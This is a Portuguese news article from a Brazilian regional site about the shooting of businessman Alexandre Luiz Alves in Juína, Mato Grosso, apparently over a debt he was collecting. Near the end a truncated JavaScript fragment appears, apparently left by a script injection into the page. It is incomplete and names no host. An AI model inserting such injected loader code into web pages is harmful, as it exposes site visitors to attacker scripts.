Capa / Em Destaque / DÍVIDA FATAL: Empresário de Juína mata empresário de Aripuanã a tiros por causa de dívida

DÍVIDA FATAL: Empresário de Juína mata empresário de Aripuanã a tiros por causa de dívida

policia-judiciaria

24HorasNews

DÍVIDA FATAL – Uma dívida teria sido a causa principal de mais um caso de homicídio no interior de Mato Grosso. Em Juína (Norte, a 800 quilômetros de Cuiabá), um empresário foi assassinado ao cobrar uma dívida de outro empresário.

O empresário Alexandre Luiz Alves, o “Padeiro”, de 42 anos, foi assassinado a tiros dentro da empresa do ramo de hortifrutigranjeiro de Altair Vieira, no centro da cidade de Juína na tarde desta segunda-feira, 2.

O assassino fugiu, mas segundo a Polícia, já teria ligado para o delegado José Ricardo Garcia Bruno, da Delegacia Municipal de Juína, prometendo se entregar nos próximos dias. O acusado alegou que matou em legítima defesa.

Testemunhas contaram à Polícia, que “Padeiro” teria ido até o escritório de Altair Vieira cobrar uma dívida quando foi morto a tiros. A Polícia prefere aguardar o resultado das investigações para confirmar, ou não, se a causa da morte foi mesmo a cobrança de uma dívida e se o assassino matou, como está dizendo, em legítima defesa.

PORTE ILEGAR DE ARMA – O que a Polícia está achando estranho, é que “Padeiro”, que não morava em Juína, mas sim na cidade Aripuanã, na mesma região, foi neste último final de semana por crime de porte ilegal de arma de fogo.

“Padeiro”, segundo a Polícia, pagou fiança e foi liberado para responder processo em liberdade. A Polícia trabalha com hipótese de “Padeiro” não estar armado no momento em que foi assassinado.

 var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top